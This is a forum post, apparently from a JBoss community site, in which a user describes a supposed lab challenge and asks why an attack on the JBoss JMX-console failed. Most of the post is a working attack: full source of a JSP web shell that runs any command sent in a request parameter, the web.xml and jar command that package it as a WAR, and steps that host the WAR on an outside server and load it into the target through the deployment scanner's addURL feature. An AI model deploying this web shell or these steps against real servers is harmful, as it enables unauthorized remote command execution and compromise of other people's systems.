0 Replies Latest reply on Jan 14, 2011 1:23 PM by lazers a

    breaking jboss with a browser? not happening

    lazers a Newbie

      I have been given task to break into jboss application by my senior sec manager at my company.

      Its a hacking challenge staged in a test lab This is what i have been given. A web-access to jboss.

      Yes that pretty much it<3. He believes in less is more philosophy. With some get to start working info.

      I have been told that a vulnerability exists inthe application and its no 0 day exploit its an known vulnerability.

      It is set as an open-book challenge i can get help anywhere i like. So what i did so for?

       

      Yes i google ; but i also run a nessus scan and the scan brought me one HIGH vulnerability.

      Its has to do with the default Jboss installation using the JMX-Console. Its not a new vulnerability

      i was able to reach this conclusion as i start googling. This particular vulnerabilityis very popular;

      I was saying to myself that my problems are over and i would be break it into jboss in record time.

      But that has been largely un-true. Why? Well if it wasn't true i wouldn't be  here. I did the following (in steps) 

       

      attack vector: deployment scanner feature

       

       

      1.confirmed the default installation (by accessing localhost:9090) in my case its

      9090 not 8080 as in hacking literature. Probably this is because em using a new version (idk exact reason)

       

      2.i wrote this jsp script(cmd.jsp) astold in sites.

      <%@ page import="java.util.*,java.io.*"%>

      <%

      %>

      <HTML><BODY>

      Commands with JSP

      <FORM METHOD="GET" NAME="myform"ACTION="">

      <INPUT TYPE="text" NAME="cmd">

      <INPUT TYPE="submit" VALUE="Send">

      </FORM>

      <pre>

      <%

      if (request.getParameter("cmd") != null) {

      out.println("Command: " + request.getParameter("cmd") +"<BR>");

      Process p =Runtime.getRuntime().exec(request.getParameter("cmd"));

      OutputStream os = p.getOutputStream();

      InputStream in = p.getInputStream();

      DataInputStream dis = new DataInputStream(in);

      String disr = dis.readLine();

      while ( disr != null ) {

      out.println(disr);

      disr = dis.readLine();

      }

      }

      %>

      </pre>

      </BODY></HTML>

       

      3.next i create a web.xml file to be placed in WEB-INF folder

       

      <?xml version="1.0" ?>

      <web-app xmlns="http://java.sun.com/xml/ns/j2ee"

      xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"

      xsi:schemaLocation="http://java.sun.com/xml/ns/j2ee

      http://java.sun.com/xml/ns/j2ee/web-app_2_4.xsd"

      version="2.4">

      <servlet>

      <servlet-name>Command</servlet-name>

      <jsp-file>/cmd.jsp</jsp-file>

      </servlet>

      </web-app>

       

      4.I complied the file cmd.jsp by placing the web.xml file in WEB-INF folder

       

      jar cvf cmd.war WEB-INF cmd.jsp

       

      5. I put this file in http-apache server. File cmd.war reside at htdocs folder. Can be accessed by url: mywebserver:80/cmd.war

       

      6.i go back to jboss defualt page and navigate myself to jboss.deploymentpage.

       

      7. in the addurl tab i enter path for my cmd.war file as

      http://mywebserver/cmd.war

       

      8. next i goto victim webserver in attempt to access my uploaded application http://victim:9090/cmd/cmd.jsp

       

      9. i get HTTP STATUS 404- /cmd/cmd.jsp

       

      my app is suppose to be hot deployed by the jboss; but this is not the case coz even after 10-20 times after u have access the file i get the same error page. I want to know what is the reason for the behavior. I know there exists other attack vector (e.g rmi and etc) but i want to stick to this until i don't figure out the reason for this failure of exploit.

       

      Em i compiling the .jsp file with incorrect syntax? do i need to have tomcat server installed instead? I read it on internet that there could be some problems in the jboss trying to get reverse shell on your web-server as jboss is it work in bind-shell mode only? I'm really clueless to what i happening i spent 12 works on this single attack vector but em not making head-ways.

       

      jboss gurus help me.

       

      thanks